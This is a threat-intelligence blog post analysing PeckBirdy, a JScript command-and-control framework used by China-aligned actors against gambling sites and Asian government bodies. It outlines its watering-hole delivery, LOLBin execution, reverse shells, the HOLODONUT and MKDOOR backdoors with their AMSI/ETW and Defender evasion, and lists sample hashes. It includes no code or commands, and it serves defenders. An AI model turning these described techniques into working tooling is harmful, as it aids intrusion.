Insights, news, education and announcements from PolySwarm

China Nexus Threat Actors Use PeckBirdy C2 Framework

Written by The Hivemind | Feb 2, 2026 6:43:12 PM

Verticals Targeted: Gambling, Government
Regions Targeted: China, Philippines, Broader Asia
Related Families: HOLODONUT, MKDOOR

Executive Summary

Researchers have identified PeckBirdy, a versatile JScript-based C2 framework, deployed since 2023 in campaigns linked to China-aligned APT actors. This framework supports multiple execution environments via living-off-the-land binaries and delivers modular backdoors in operations targeting gambling operations and government entities.

Key Takeaways

  • PeckBirdy operates as a flexible script framework using JScript for compatibility across browsers, MSHTA, WScript, and other environments, enabling roles from watering-hole delivery to reverse shells and persistent C2.
  • Two campaigns were observed: SHADOW-VOID-044 targeting Chinese gambling sites with social engineering for backdoor installation, and SHADOW-EARTH-045 focusing on Asian government and private entities for credential harvesting and lateral movement.
  • Associated backdoors include HOLODONUT and MKDOOR.

What is PeckBirdy?

Since 2023, security researchers have monitored threat operations employing PeckBirdy, a previously undocumented script-based command-and-control framework written in JScript. This design choice facilitates execution through various living-off-the-land binaries (LOLBins), allowing deployment across diverse environments such as browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET ScriptControl. PeckBirdy adapts its capabilities based on the execution context, sandboxed in browsers for limited actions or more direct system interaction in MSHTA and similar hosts. Trend Micro reported on this activity.

In observed activities, PeckBirdy appears in multiple attack phases. In watering-hole scenarios, malicious scripts injected into websites trigger downloads of the main PeckBirdy script upon victim visitation, often leading to fake software update pages that prompt execution of malicious files. One campaign, SHADOW-VOID-044, beginning in 2023, focused on Chinese gambling websites, using PeckBirdy to deliver social engineering lures and backdoors. A later campaign, SHADOW-EARTH-045, from July 2024, targeted Asian government entities and private organizations, injecting PeckBirdy links into government sites for credential theft or employing MSHTA for lateral movement in compromised networks.

The framework's server exposes APIs for clients to retrieve environment-specific landing scripts using an ATTACK_ID. Embedded configurations control server domain, ports, retry intervals, and heartbeat timing. Execution context detection relies on environment-specific objects, after which PeckBirdy generates a victim ID, via hardware hashing in local environments or random strings otherwise.

Communication defaults to WebSocket, falling back to Flash ActiveX TCP sockets or HTTP-based Comet/LocalComet methods. Initial requests include domain, URL, victim ID, ATTACK_ID, and session ID; responses deliver second-stage scripts with AES-encrypted and Base64-encoded payloads. Delivered scripts observed include CVE-2020-16040 exploitation for Chrome, social engineering pop-ups, Electron JS backdoor delivery, and TCP reverse shell establishment.

Two modular backdoors link to SHADOW-VOID-044 infrastructure. HOLODONUT, a .NET backdoor, deploys via NEXLOAD downloader. It employs AMSI/ETW bypass and Donut for in-memory execution, supporting plugin handling alongside built-in commands for info collection, sleep, and exit. MKDOOR comprises a downloader and backdoor module. The downloader fetches the module from C2, adds exclusions to bypass Defender, and disguises traffic as Microsoft support/activation pages. The backdoor supports module install/uninstall/execute, status feedback, sleep, and exit commands.

Attribution connects SHADOW-VOID-044 to UNC3569 via GRAYRABBIT backdoor overlaps and TheWizard via HOLODONUT and WizardNet ties. Additional links include Cobalt Strike samples and BIOPASS RAT techniques, potentially associating with Earth Lusca. SHADOW-EARTH-045 shows low-confidence ties to Earth Baxia via infrastructure overlaps in Philippine and African incidents. These operations demonstrate China-aligned actors' increasing reliance on dynamic, script-based frameworks to exploit LOLBins, complicating detection due to runtime code generation and minimal persistence.

IOCs

PolySwarm has multiple samples of PeckBirdy.

 

336a0be2dfa60e6beee133cff185bc258b480fb231d5d7eacaca6dfde0db3f81

74a73e1461dffcf445f195cede0204f44afef8c4b6f37391a0c314e20ed8f7b7

691d3a5ea614b5bf371001941635788e680ad938f06ee4dfd25768422eaedd6f

ef67e340d31cbc7bd0d5f77581801142b25b0bc636bb97c04e4ed3c757532227


Click here to view all samples of PeckBirdy in our PolySwarm portal.

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 
View full post